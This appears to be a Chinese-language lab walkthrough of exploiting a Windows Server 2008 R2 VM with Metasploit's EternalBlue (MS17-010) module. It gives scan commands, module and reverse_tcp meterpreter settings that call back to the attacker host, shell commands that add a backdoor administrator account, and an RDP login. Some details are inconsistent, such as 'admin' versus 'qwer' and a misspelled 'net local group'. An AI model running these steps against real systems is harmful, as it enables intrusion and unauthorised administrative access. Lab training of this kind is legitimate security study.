渗透测试:metasploit+ms-17-010+Windows2008r2
工具
1 vbox
2 kali
3 win2008r2
最终效果
创建一个属于Administrators组的用户admin,并使用admin账户进入系统。
实现步骤
1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机
现在我们发现了3台主机。
2 使用nmap进行扫描
nmap基本功能有三个
(1)是扫描主机端口,嗅探所提供的网络服务
(2)是探测一组主机是否在线
(3)还可以推断主机所用的操作系统,到达主机经过的路由,系统已开放端口的软件版本
nmap 扫描连续的IP地址的方法是使用“-”将主机位的第一位和最后一位接起来。
这里我们可以看到192.168.1.4这台主机开放了3389端口,3389端口是一个远程桌面的服务端口,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。
这个功能在后续的环节有用。
3 测试环境
攻击机:kali
ip:192.168.1.5
靶机:win2008r2
ip:192.168.1.4
4 使用metasploit的ms-17-010 payload
1 metasploit 主界面
2 搜索ms17_010
search ms17_010
选择第3 个
# 3
name : exploit/windows/smb/ms17_010_eternalblue
disclosure date : 2017-03-14
rank : average
check : No
description : MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 调用模块 exploit/windows/smb/ms17_010_eternalblue及配置payload
use exploit/windows/smb/ms17_010_eternalblue
查看模块需要设置的
show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.5
rhosts => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
设置目标IP地址及选择payload,查看payload要求
payload 要求设置监听主机,这里写本地kali的ip地址
set lhost 192.168.1.4
最后再查看一下设置
show options
4 开始攻击
exploit
发现是因为把本地kali ip与 远程win2008的ip弄混了
重新设置一下
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.4
rhost => 192.168.1.4
再次进行攻击
####5 进shell提权
shell
添加用户并将用户加入管理组
然后使用windos cmd命令进行创建用户并加入管理员组
net user qwer asdf123! /add
注意密码要符合复杂性要求
net local group Administrators qwer /add
把admin用户加入本地管理员组
6 远程桌面连接登录
这里之前的3389端口可以用到了
使用创建的qwer用户进行登录
登录成功